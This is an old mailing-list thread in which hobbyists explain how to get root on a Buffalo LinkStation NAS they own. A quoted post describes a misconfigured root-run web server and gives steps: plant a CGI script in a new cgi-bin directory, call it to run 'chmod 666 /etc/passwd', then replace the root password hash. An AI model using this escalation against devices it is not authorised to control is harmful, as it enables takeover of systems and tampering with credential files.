3917Re: Howto gain root access to the LInkstation
- Aug 18, 2005Media server up and running - just got to sort shoutcast out
--- In LinkStation_General@yahoogroups.com, "cs_h1" <cs_h1@y...>
> Done all this for LSII - how do you actually start the music server?login
> --- In LinkStation_General@yahoogroups.com, "Thom Mason"
> <t.e.mason@c...> wrote:
> > dtaubert on the Roku Forums figured out a backdoor into the
> > Linkstation (see http://www.rokulabs.com/forums/viewtopic.php?
> > The 1.44 firmware update has telnet access enabled. You can
> > using a user account setup through the Admin web interface.such
> > dtauberts poking around revealed:
> > USER PID %CPU %MEM VSZ RSS TTY STAT START TIME
> > COMMAND
> > root 373 0.0 0.8 2132 536 ? SN Sep16
> > 0:01 /usr/sbin/thttpd -C /etc/thttpd.conf
> > $ cat /etc/thttpd.conf
> > dir=/www
> > user=root
> > logfile=/var/log/thttpd.log
> > pidfile=/var/run/thttpd.pid
> > port=80
> > charset=
> > cgipat=/cgi-bin*/*
> > $ ls -ald /www
> > drwxrwxrwx 9 root root 1024 Sep 17 15:40 /www
> > In other words:
> > 1) The http server is run as root.
> > 2) The cgipat contains a wildcard in the directory name.
> > 3) The /www directory is writable by all.
> > mkdir /www/cgi-bin3 and plop a script in (it will run as root).
> > can either make a scipt to change access for /etc/passwd:
> > #! /bin/sh
> > chmod 666 /etc/passwd
> > and then paste it into you browser:
> > http://buffalo/cgi-bin3/accesspass.sh
> > making sure the script is set as executable or make a script
> > a modified passwd file to /etc/passwd.
> > You can then change the root password to a known encrypted one
> > as the one for the user account you used to gain telnet access.
> > vi works although you may need to set TERM to vt100 since there
> > doesn't appear to be a termcap entry for xterm (depends on you
> > telnet client emulation).
> > Thom
- << Previous post in topic